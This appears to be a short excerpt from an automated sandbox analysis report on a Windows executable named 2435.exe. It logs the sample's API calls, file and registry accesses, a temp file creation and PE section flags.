          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404356
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01
          Source: C:\Users\user\Desktop\2435.exeFile created: C:\Users\user\AppData\Local\Temp\nsq164.tmpJump to behavior
          Source: 2435.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2435.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\2435.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts